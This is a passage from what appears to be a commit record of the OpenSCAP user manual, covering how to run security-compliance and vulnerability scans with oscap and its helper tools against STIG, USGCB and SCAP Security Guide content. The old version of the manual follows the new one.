4) Display a list of available profiles.
----
$ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

5) Evaluate your favorite profile, for example *MAC-1_Public*, and write
XCCDF results into the results.xml file.
----
$ oscap xccdf eval \
--profile MAC-1_Public \
--results results.xml \
--cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \
U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

6) Generate a scan report that is readable in a web browser.
----
$ oscap xccdf generate report --output report.html results.xml
----

If you are interested in DISA STIG content for RHEL5 or RHEL7, please visit the
{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 5*
or *Red Hat Enterprise Linux 7* as a target product.

=== How to Evaluate United States Government Configuration Baseline (USGCB)
NOTE: NIST offers no official USGCB for RHEL6 as of September 2014, but you can
acquire the content from the {ssg_git}[SSG] project.

The USGCB content represents a Tier IV Checklist for Red Hat
Enterprise Linux 5 (as defined by NIST Special Publication 800-70).

WARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1
or later.

After ensuring that the version of OpenSCAP on your system is
sufficient, perform the following tasks:

1) Download the USGCB content.
----
$ wget http://usgcb.nist.gov/usgcb/content/scap/USGCB-rhel5desktop-1.2.5.0.zip
----

2) Unpack the USGCB content.
----
$ unzip USGCB-rhel5desktop-1.2.5.0.zip
----

3) Run evaluation of the USGCB content.
----
$ oscap xccdf eval \
--profile united_states_government_configuration_baseline \
--cpe usgcb-rhel5desktop-cpe-dictionary.xml \
--oval-results \
--fetch-remote-resources \
--results results.xml \
usgcb-rhel5desktop-xccdf.xml
----

4) Generate a scan report that is readable in a web browser.
----
$ oscap xccdf generate report --output report.html results.xml
----

Additional reports can be generated from the detailed OVAL result files.
The scanner outputs OVAL result files in the current directory; for each
OVAL file on input there is one output. In the case of USGCB, one
OVAL file is distributed along with the XCCDF, and another one is
downloaded from the Red Hat repository. The latter contains CVE information
for each evaluated definition.

----
$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml
$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml
----

If you're interested in running an evaluation of the USGCB on a remote machine using
a GUI, please see the
https://open-scap.org/resources/documentation/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench/[Evaluate
Remote Machine for USGCB Compliance with SCAP Workbench] tutorial.


=== How to Evaluate Third-Party Guidances
The SCAP content repository hosted at the {nvd}[National Vulnerability Database]
(NVD) can be searched for publicly available guidances for a given
product.
For example, as of 2013/05/11 there are
http://web.nvd.nist.gov/view/ncp/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]
Tier III checklists for Red Hat Enterprise Linux 5. Analogously, the
MITRE Corp. hosts a http://oval.mitre.org/rep-data/[repository] of OVAL
content for various platforms, sorted by versions and classes.

Like the USGCB, any downloaded guidance can be evaluated by
OpenSCAP.

* Exemplary evaluation of the DoD Consensus Security Configuration Checklist
for Red Hat Enterprise Linux 5 (2.0)
----
$ wget http://nvd.nist.gov/ncp/DoD-RHEL5-desktop.zip
$ unzip DoD-RHEL5-desktop.zip
$ oscap xccdf eval \
--profile DOD_baseline_1.0.0.1 \
--cpe dcb-rhel5_cpe-dictionary.xml \
--results result.xml \
--oval-results \
dcb-rhel5_xccdf.xml
----

* Exemplary evaluation of the Red Hat 5 STIG Benchmark (Version 1, Release 12)
----
$ wget http://iasecontent.disa.mil/stigs/zip/July2015/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip
$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip
$ oscap xccdf eval \
--profile MAC-2_Public \
--cpe U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml \
--results result.xml \
--oval-results \
U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml
----

Furthermore, any individual file from the archive can be inspected using
the `oscap info` command. The oscap program does not have
the concept of importing SCAP files; it simply processes any SCAP
files available on the filesystem. That is possible because the SCAP
standard files are native file formats of OpenSCAP.



=== How to evaluate guidances for Red Hat Enterprise Linux 6 or 7
Guidances for Red Hat Enterprise Linux 6 and 7 can be acquired from the
{ssg_git}[SCAP Security Guide
project] (SSG). SSG currently holds the most evolved and elaborate SCAP
policy for Linux systems. The project provides practical security
hardening advice for Red Hat products and also links it to compliance
requirements in order to ease deployment activities, such as
certification and accreditation.

The project started in 2011 as an open collaboration of U.S. Government
bodies to develop the next generation of the United States Government
Configuration Baseline (USGCB) for Red Hat Enterprise Linux 6. There are
multiple parties contributing to the project from both the public and
private sectors.

The SSG project contains baselines for both desktops and servers. See
https://github.com/OpenSCAP/scap-security-guide



=== How to check that patches are up-to-date on Red Hat Enterprise Linux 6 or 7
This section describes how to check that software patches are up-to-date using
external OVAL content.

1) Install the SSG

----
$ sudo yum install -y scap-security-guide
----

2a) Evaluate the common profile for RHEL 6

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--fetch-remote-resources \
--results-arf results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

2b) Evaluate the common profile for RHEL 7

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--fetch-remote-resources \
--results-arf results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----

This command evaluates the common profile for Red Hat Enterprise Linux 6 or 7. Part of
the profile is a rule to check that patches are up-to-date. To evaluate the rule
correctly, the oscap tool needs to download an up-to-date OVAL file from Red Hat
servers. This is enabled using the *--fetch-remote-resources* option. The result of
this scan will be saved in **results.xml** in the ARF format.
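3) Optionally, generate an HTML report from the ARF result file; as noted
elsewhere in this manual, `oscap xccdf generate report` accepts ARF files as
well as plain XCCDF results:

----
$ oscap xccdf generate report --output report.html results.xml
----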
=== How to tailor Source data stream
This section describes tailoring content using a tailoring file, which allows
you to change the behavior of content without modifying it directly.

1) Obtain a tailoring file

A tailoring file can be easily generated using {workbench_url}[SCAP Workbench].

2) List the profiles of the tailoring file

----
$ oscap info ssg-rhel6-ds-tailoring.xml
Document type: XCCDF Tailoring
Imported: 2016-08-31T11:08:16
Benchmark Hint: /usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
Profiles:
	xccdf_org.ssgproject.content_profile_C2S_customized
----

3) Evaluate

----
$ oscap xccdf eval \
--profile xccdf_org.ssgproject.content_profile_C2S_customized \
--tailoring-file ssg-rhel6-ds-tailoring.xml \
--results results.xml \
/usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

The command above evaluates the data stream tailored by the **ssg-rhel6-ds-tailoring.xml** tailoring file.
XCCDF results can be found in the **results.xml** file.

Instead of an external tailoring file, you can also use a tailoring component integrated into the data stream.

----
$ oscap info simple-ds.xml

Document type: Source Data Stream
Imported: 2016-02-02T14:06:14

Stream: scap_org.open-scap_datastream_from_xccdf_simple-xccdf.xml
Generated: (null)
Version: 1.2
Checklists:
	Ref-Id: scap_org.open-scap_cref_simple-xccdf.xml
		Status: incomplete
		Resolved: false
		Profiles:
			xccdf_org.open-scap_profile_override
		Referenced check files:
			simple-oval.xml
				system: http://oval.mitre.org/XMLSchema/oval-definitions-5
	Ref-Id: scap_org.open-scap_cref_simple-tailoring.xml
		Benchmark Hint: (null)
		Profiles:
			xccdf_org.open-scap_profile_default
			xccdf_org.open-scap_profile_unselecting
			xccdf_org.open-scap_profile_override
Checks:
	Ref-Id: scap_org.open-scap_cref_simple-oval.xml
No dictionaries.
----

To choose the tailoring component "scap_org.open-scap_cref_simple-tailoring.xml", the command below can be used.

----
$ oscap xccdf eval \
--tailoring-id scap_org.open-scap_cref_simple-tailoring.xml \
--profile xccdf_org.open-scap_profile_default \
--results results.xml simple-ds.xml
----

The command above evaluates the content using the tailoring component *scap_org.open-scap_cref_simple-tailoring.xml* from the source data stream.
Scan results are stored in the *results.xml* file.


=== Evaluation of content
The specified XCCDF or data stream content can contain zero or more profiles.

A scan can be run without selecting a specific profile; otherwise, a profile can be selected using
the *--profile* option.

----
$ oscap xccdf eval --results results.xml /usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----

The command above evaluates rules without a specific profile. XCCDF results are stored in the *results.xml* file.
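To evaluate a specific profile instead, add the *--profile* option with one of
the profile IDs listed by `oscap info`; for example (the profile ID shown here
is illustrative and must actually exist in the given data stream):

----
$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_pci-dss --results results.xml /usr/share/xml/scap/ssg/content/ssg-rhel6-ds.xml
----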
== Other utilities

Apart from the `oscap` command, OpenSCAP also provides other utilities for
special purposes. Those utilities use `oscap` under the hood, but they
enable users to perform advanced tasks in a single command.
This manual gives a quick overview and shows basic usage of these tools.
Each of the tools has its own manual page that gives more detailed information.

=== Scanning remote machines using oscap-ssh

`oscap-ssh` is a simple tool for scanning remote machines with OpenSCAP
over the network and collecting the results.

The tool uses an SSH connection to copy the SCAP content to the remote machine, then
it runs an evaluation of the target system and downloads the results back.
The remote machine needs to have OpenSCAP installed.

The tool can evaluate source DataStreams and OVAL files.
Usage of the tool mimics the usage and options of the `oscap` tool.

In the following example, we will scan a remote Fedora server located at IP address
*192.168.1.13* that listens for SSH connections on port *22*.
The server will be scanned for compliance with the *Common Profile for General-Purpose
Fedora Systems* provided by SCAP Security Guide.
The HTML report is written out as *report.html* on the local machine.

----
$ oscap-ssh root@192.168.1.13 22 xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--report report.html \
/usr/share/xml/scap/ssg/content/ssg-fedora-ds.xml
----

=== Scanning of Docker containers and images using oscap-docker

`oscap-docker` is used to scan Docker containers and images. It can
assess vulnerabilities in the container or image and check their compliance
with security policies. Usage of the tool mimics the usage and options
of the `oscap` tool.

The `oscap-docker` tool uses a technique called offline scanning:
the filesystem of the container is mounted read-only to a directory
on the host, and OpenSCAP then assesses
the container from the host. Therefore, no agent is installed
in the container, and the container is not touched or changed in any way.

However, `oscap-docker` requires http://www.projectatomic.io/[Atomic]
installed on the host. Atomic is an advanced container management solution, and
it enables `oscap-docker` to access the containers.

In the first example, we will perform a vulnerability assessment
of a Docker image of Red Hat Enterprise Linux 7 (named *rhel7*). The command
will attach the Docker image, determine the OS variant/version, download the CVE stream
applicable to the given image, and finally evaluate the image
for vulnerabilities.
The CVE stream is a list of vulnerabilities in SCAP format
and is downloaded directly from Red Hat.
The HTML report is written out as *report.html* on the local machine.

----
$ oscap-docker image-cve rhel7 --report report.html
----

In the second example, we will check the same *rhel7* image for
compliance with a security policy specified in an XCCDF checklist.

----
$ oscap-docker image rhel7 xccdf eval --report report.html xccdf.xml
----

To scan running containers, the commands are very similar; just replace
"image-cve" with "container-cve" and "image" with "container".

=== Scanning of virtual machines using oscap-vm

OpenSCAP provides a simple tool to evaluate virtual machines called `oscap-vm`.

The tool can scan a given virtual machine directly from the virtualization host.
Usage of the tool mimics the usage and options of the `oscap` tool.

Similarly to `oscap-docker`, this utility also uses offline scanning,
so it doesn't install anything in the guest, doesn't require OpenSCAP to be
installed in the guest, and doesn't create or change anything in the
guest's filesystem.

=== Scanning arbitrary filesystems using oscap-chroot

A very simple script, `oscap-chroot`, can be used to perform
an offline scan of a filesystem that is mounted at an arbitrary path.
It can be used for scanning custom objects that are not supported
by `oscap-docker` or `oscap-vm`, like containers in formats
other than Docker.
Again, usage of the tool mimics the usage and options of the `oscap` tool.
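As a rough illustration of both tools (a sketch only: the domain name, mount
point, profile, and data stream path below are placeholders, and the exact
targets accepted by `oscap-vm` may differ between versions):

----
# scan a libvirt domain named "rhel7-vm" from the virtualization host
$ oscap-vm domain rhel7-vm xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--report report.html \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml

# scan a filesystem tree mounted at /mnt/guest-fs
$ oscap-chroot /mnt/guest-fs xccdf eval \
--profile xccdf_org.ssgproject.content_profile_common \
--report report.html \
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml
----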
== Frequently Asked Questions (FAQs)
*Why do I get "notchecked" results when I use e.g. the https://dl.dod.cyber.mil/wp-content/uploads/stigs/zip/U_Red_Hat_Enterprise_Linux_7_V2R3_STIG.zip[STIG checklist]?*

The downloaded guidance contains rule descriptions, but it doesn't contain the OVAL checks which could be used for evaluation by OpenSCAP. You can find guidance with implemented OVAL checks, and also with remediations, at the https://github.com/ComplianceAsCode/content[ComplianceAsCode] project, which contains a wide range of profiles.

*I try to apply a tailoring file, but OpenSCAP still evaluates rules that I have unselected. How can I enforce my changes to the profile?*

Make sure that you provide the ID of the customized profile in the `--profile` option instead of the ID of the original profile.
If you created the tailoring file using SCAP Workbench, you were prompted to choose the ID of the customized profile. You can display the ID of the customized profile by running `oscap info <your_tailoring_file>`. By default, the ID of the customized profile ends with the `_customized` suffix.
","old_contents":"= OpenSCAP User Manual
:imagesdir: ./images
:workbench_url: https://www.open-scap.org/tools/scap-workbench/
:sce_web: https://www.open-scap.org/features/other-standards/sce/
:openscap_web: https://open-scap.org/
:oscap_git: https://github.com/OpenSCAP/openscap
:ssg_git: https://github.com/OpenSCAP/scap-security-guide
:xmlsec: https://www.aleksey.com/xmlsec/
:xslt: http://www.w3.org/TR/xslt
:xsl: http://www.w3.org/Style/XSL/
:ssg: http://open-scap.org/security-policies/scap-security-guide/
:xccdf: http://scap.nist.gov/specifications/xccdf/
:xccdf_1-2: http://scap.nist.gov/specifications/xccdf/#resource-1.2
:scap: http://scap.nist.gov/
:nist: http://www.nist.gov/
:cpe: https://cpe.mitre.org/
:cce: https://cce.mitre.org/
:oval: https://oval.mitre.org/
:pci_dss: https://www.pcisecuritystandards.org/security_standards/
:usgcb: http://usgcb.nist.gov/
:stig: http://iase.disa.mil/stigs/Pages/index.aspx
:scap_1-2: http://scap.nist.gov/revision/1.2/
:scap_1-1: http://scap.nist.gov/revision/1.1/index.html
:scap_1-0: http://scap.nist.gov/revision/1.0/
:nvd: https://web.nvd.nist.gov/view/ncp/repository
:toc:
:toc-placement: preamble
:numbered:

image::vertical-logo.png[align="center"]

toc::[]

== Introduction

This documentation provides information about a command-line tool called
`oscap` and its most common operations. With `oscap` you can check the
security configuration settings of a system, and examine the system for signs of
a compromise by using rules based on standards and specifications. The
`oscap` tool uses {scap}[SCAP], a line of specifications maintained by
{nist}[NIST] that was created to provide a standardized approach to
maintaining system security. New specifications are governed by NIST's SCAP
http://scap.nist.gov/timeline.html[Release cycle] in order to provide a
consistent and repeatable revision workflow. `oscap` mainly processes
{xccdf}[XCCDF], which is a standard way of expressing checklist content and
defining security checklists. It also combines with other specifications such as
{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that
can be processed by SCAP-validated products. For more information about
SCAP, please refer to http://open-scap.org/features/standards/[SCAP Standards].

The `oscap` tool is a part of the {openscap_web}[OpenSCAP] project. If you're
interested in a graphical alternative to this tool, please visit the
{workbench_url}[SCAP Workbench] page.


We will use the {ssg}[SCAP Security Guide] project to provide the SCAP
content. It provides security policies written in the form of SCAP documents
covering many areas of computer security, and it implements security guidance
recommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and
{usgcb}[USGCB].

You can also generate your own SCAP content if you have an understanding of at least
XCCDF or OVAL.
XCCDF content is also frequently published online under open
source licenses, and you can customize this content to suit your needs instead.
SCAP Workbench is a great tool to do the customization.

The Basic oscap Usage section of the manual presents how to install the tool
and SCAP content, and how to use them to examine SCAP content, perform a
configuration scan, or automatically remediate your machines.

The third section covers advanced topics like validation, signing and
transformation of SCAP content, generating reports and guides, and also some
information about CPE applicability.

== Basic oscap Usage

If you want to perform configuration or vulnerability scans of a local system,
then the following must be available:

 . A tool (`oscap` or SCAP Workbench)
 . SCAP content (XCCDF, OVAL...)

=== Installation

You can either build the OpenSCAP library and the `oscap` tool from
{oscap_git}[source] (for details please refer to the <<../developer/developer.adoc#,Developer Documentation>>),
or you can use an existing build for your Linux distribution. Use the
following yum command if you want to install the oscap tool on your
Fedora or Red Hat Enterprise Linux distribution:

----
# yum install openscap-scanner
----

NOTE: If the `openscap-scanner` package is not available, install
`openscap-utils` instead.

Before you can start using the `oscap` tool, you must have some SCAP content
on your system. You can download it from the respective web site, but we
will use the SSG project in the following sections. You can build it from the
{ssg_git}[source] or you can install it using a package management system:

----
# yum install scap-security-guide
----

The SCAP content will be installed in *__/usr/share/xml/scap/ssg/content/__*.

When the SCAP content is imported or installed on your system, `oscap` can
process the content by specifying the file path to the content. The `oscap`
tool supports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP
{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in
order to import and process earlier versions of the SCAP content.

To display the version of oscap, supported specifications, built-in CPE
names, and supported OVAL objects, type the following command:

----
$ oscap -V
----

=== Displaying Information about SCAP Content
One of the capabilities of `oscap` is to display information about the SCAP
contents within a file. Running the `oscap info` command allows the
examination of the internal structure of a SCAP document and displays
information such as the document type, specification version, status, the date
the document was published (**Generated**) and the date the document was copied to
the file system (**Imported**).
When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams.\n\nThe following example demonstrates usage and sample output of the\ncommand when target is SCAP data stream:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\nDocument type: Source Data Stream\nImported: 2016-08-10T20:49:16\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n Status: draft\n Generated: 2016-08-10\n Resolved: true\n Profiles:\n xccdf_org.ssgproject.content_profile_standard\n xccdf_org.ssgproject.content_profile_pci-dss\n xccdf_org.ssgproject.content_profile_C2S\n xccdf_org.ssgproject.content_profile_rht-ccp\n xccdf_org.ssgproject.content_profile_common\n xccdf_org.ssgproject.content_profile_stig-rhel7-workstation-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-gui-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n xccdf_org.ssgproject.content_profile_ospp-rhel7-server\n xccdf_org.ssgproject.content_profile_nist-cl-il-al\n xccdf_org.ssgproject.content_profile_cjis-rhel7-server\n Referenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-ocil.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\nand when XCCDF document is examined:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2016-08-10T20:49:16\nStatus: draft\nGenerated: 2016-08-10\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n----\n\n**Document type** describes what format the file is in. Common types include\nXCCDF, OVAL, Source Data Stream and Result Data Stream.\n\n**Checklist version** is the XCCDF version only shown for XCCDF files. Common\nvalues are 1.1 and 1.2.\n\n**Imported** is the date the file was imported for use with OpenSCAP. Since\nOpenSCAP uses the local filesystem and has no proprietary database format\nthe imported date is the same as file modification date.\n\n**Status** is the XCCDF Benchmark status. Common values include \"accepted\",\n\"draft\", \"deprecated\" and \"incomplete\". Please refer to the XCCDF specification\nfor details. This is only shown for XCCDF files.\n\n**Generated** date is the date the file was created \/ generated. 
This date
is shown for XCCDF files and Checklists and is sourced from the XCCDF **Status**
element.

**Checklists** lists the available checklists incorporated in the Data Stream that
you can use for the `--benchmark-id` command line attribute with `oscap xccdf
eval`. Detailed information is also printed for each checklist.

**Profiles** lists the available profile IDs that you can use for the `--profile`
command line attribute with `oscap xccdf eval`.

==== More Information about Result Files (XCCDF and ARF)

`oscap info` is less helpful with XCCDF results and ARF files. Two important
dates that are commonly requested are the evaluation start and end dates.

To look them up in the XCCDF result file, open the file and look for the
TestResult element. The **start-time** and **end-time** attributes contain the evaluation
times and dates.

----
<TestResult id="xccdf_org.open-scap_testresult_common"
    start-time="2017-01-21T19:16:28" end-time="2017-01-21T19:17:35">
----

To look up the dates in an ARF file, open the file and again look for the TestResult
elements. The elements will be located in the arf:report elements.

----
<arf:reports>
  <arf:report id="xccdf1">
    <arf:content>
      <TestResult xmlns="http://checklists.nist.gov/xccdf/1.2"
          id="xccdf_org.open-scap_testresult_xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream"
          start-time="2017-01-20T14:30:18" end-time="2017-01-20T14:36:32">
----

You can also find both dates in an HTML report, in the **Evaluation
characteristics** table. To generate an HTML report from an XCCDF result or ARF file, use
the `oscap xccdf generate report` command.

=== Scanning with OSCAP
The main goal of the `oscap` tool is to perform configuration and
vulnerability scans of a local system. `oscap` is able to evaluate both
XCCDF benchmarks and OVAL definitions and generate the appropriate
results. Please note that SCAP content can be provided either in a
single file (as an OVAL file or SCAP Data Stream), or as multiple
separate XML files. The following examples distinguish between these
approaches.

==== OVAL
The SCAP document can take the form of a single OVAL file (an OVAL
Definition file). The `oscap` tool processes the OVAL Definition file
during evaluation of OVAL definitions. It collects system
information, evaluates it and generates an OVAL Result file. The result
of the evaluation of each OVAL definition is printed to the standard output
stream.
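Each evaluated definition produces one line of output; for example (an
illustrative line, following the output format shown later in this manual):

----
Definition oval:com.example.www:def:1: true
----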
The following examples describe the most common scenarios
involving an OVAL Definition file.

* To evaluate all definitions within the given OVAL Definition file, run
the following command:
----
$ oscap oval eval --results oval-results.xml scap-oval.xml
----
Where *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*
is the OVAL Result file.

* The following is an example of evaluating one particular definition
within the given OVAL Definition file:
----
$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml
----
Where the OVAL definition being evaluated is identified by the
*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file,
and *oval-results.xml* is the OVAL Result file.

* To evaluate all definitions from the OVAL component that are part of a
particular data stream within a SCAP data stream collection, run the
following command:
----
$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml
----
Where *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file
specifying the OVAL component, *oval-results.xml* is the OVAL Result
file, and *scap-ds.xml* is a file representing the SCAP data stream
collection.


When the SCAP content is represented by multiple XML files, the OVAL
Definition file can be distributed along with the XCCDF file. In such a
situation, OVAL Definitions may depend on variables that are exported
from the XCCDF file during the scan, and separate evaluation of the OVAL
definition(s) would produce misleading results. Therefore, any external
variables have to be exported to a special file that is used during the
OVAL definitions evaluation.
The following commands are examples of this
scenario:

----
$ oscap xccdf export-oval-variables \
--profile united_states_government_configuration_baseline \
usgcb-rhel5desktop-xccdf.xml
----
----
$ oscap oval eval \
--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \
--results usgcb-results-oval.xml \
usgcb-rhel5desktop-oval.xml
----
Where *united_states_government_configuration_baseline* represents a
profile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file
specifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL
Definition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the
file containing exported variables from the XCCDF file, and
*usgcb-results-oval.xml* is the OVAL Result file.

An OVAL directives file can be used to control whether results should be "thin" or "full".
This file can be loaded by OpenSCAP using the *--directives <file>* option.

Example of an OVAL directives file which enables thin results instead of
full results:

----
<?xml version="1.0" encoding="UTF-8"?>
<oval_directives
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:oval="http://oval.mitre.org/XMLSchema/oval-common-5"
    xmlns:oval-res="http://oval.mitre.org/XMLSchema/oval-results-5"
    xmlns="http://oval.mitre.org/XMLSchema/oval-directives-5"
    xsi:schemaLocation="http://oval.mitre.org/XMLSchema/oval-results-5
    oval-results-schema.xsd http://oval.mitre.org/XMLSchema/oval-common-5
    oval-common-schema.xsd http://oval.mitre.org/XMLSchema/oval-directives-5
    oval-directives-schema.xsd">
  <generator>
    <oval:product_name>OpenSCAP</oval:product_name>
    <!-- make sure the OVAL version matches your input -->
    <oval:schema_version>5.8</oval:schema_version>
    <oval:timestamp>2017-02-04T00:00:00</oval:timestamp>
  </generator>
  <directives include_source_definitions="true">
    <oval-res:definition_true reported="true" content="thin"/>
    <oval-res:definition_false reported="true" content="thin"/>
    <oval-res:definition_unknown reported="true" content="thin"/>
    <oval-res:definition_error reported="true" content="thin"/>
    <oval-res:definition_not_evaluated reported="true" content="thin"/>
    <oval-res:definition_not_applicable reported="true" content="thin"/>
  </directives>
</oval_directives>
----

If your use-case requires thin OVAL results, you most likely also want
to omit system characteristics. You can use the *--without-syschar*
option to that effect.

Usage of an OVAL directives file when scanning a plain OVAL file:

----
$ oscap oval eval --directives directives.xml --without-syschar --results oval-results.xml oval.xml
----

Usage of an OVAL directives file when scanning an OVAL component from a Source DataStream:

----
$ oscap oval eval --directives directives.xml --without-syschar --datastream-id ds.xml --oval-id oval.xml --results oval-results.xml scap-ds.xml
----

It is not always clear which OVAL file will be used when multiple files
are distributed.
In case you are evaluating an XCCDF file you can use:\n\n---------------------------------------------------------------------------------------------------\n$ oscap info ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2017-01-20T14:20:43\nStatus: draft\nGenerated: 2017-01-19\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n stig-rhevh-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\n docker-host\n nist-800-171-cui\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n---------------------------------------------------------------------------------------------------\n\nIn the output you can see all referenced check files. In this case we see\nthat `ssg-rhel7-oval.xml` is referenced. To see contents of this file you\ncan open it in a text editor.\n\nYou can use `oscap info` with Source DataStream files as well. Source\nDataStream will often reference OVAL files that are bundled in it.\nIt is also possible to extract OVAL files from Source DataStream through `oscap ds sds-split`.\n\n---------------------------------------------------------------------------------------------------\n$ oscap ds sds-split ssg-rhel7-ds.xml extracted\/\n$ ls -1 extracted\/\nscap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\nscap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\nssg-rhel7-cpe-oval.xml\nssg-rhel7-ocil.xml\nssg-rhel7-oval.xml\n---------------------------------------------------------------------------------------------------\n\nAfter splitting the Source DataStream you can inspect OVAL and XCCDF files\nindividually using a text editor. Keep in mind that this is only an example\nand filenames depend on contents of the DataStream you are splitting and that\nyou can also inspect XCCDF and OVAL content directly in Source DataStream\nor Result DataStream.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, `oscap` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. 
The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe meaning of results is defined by https:\/\/csrc.nist.gov\/CSRC\/media\/Publications\/nistir\/7275\/rev-4\/final\/documents\/nistir-7275r4_updated-march-2012_clean.pdf[XCCDF Specification].\nThis table lists the possible results of a single rule:\n\n.XCCDF results\n|===\n|Result |Description |Example Situation\n\n|pass\n|The target system or system component satisfied all the conditions of the rule.\n|\n\n|fail\n|The target system or system component did not satisfy all the conditions of the rule.\n|\n\n|error\n|The checking engine could not complete the evaluation, therefore the status of the target\u2019s compliance with the rule is not certain.\n|OpenSCAP was run with insufficient privileges and could not gather all of the necessary information.\n\n|unknown\n|The testing tool encountered some problem and the result is unknown.\n|OpenSCAP was unable to interpret the output of the checking engine (the output has no meaning to OpenSCAP).\n\n|notapplicable\n|The rule was not applicable to the target of the test.\n|The rule might have been specific to a different version of the target OS, or it might have been a test against a platform feature that was not installed.\n\n|notchecked\n|The 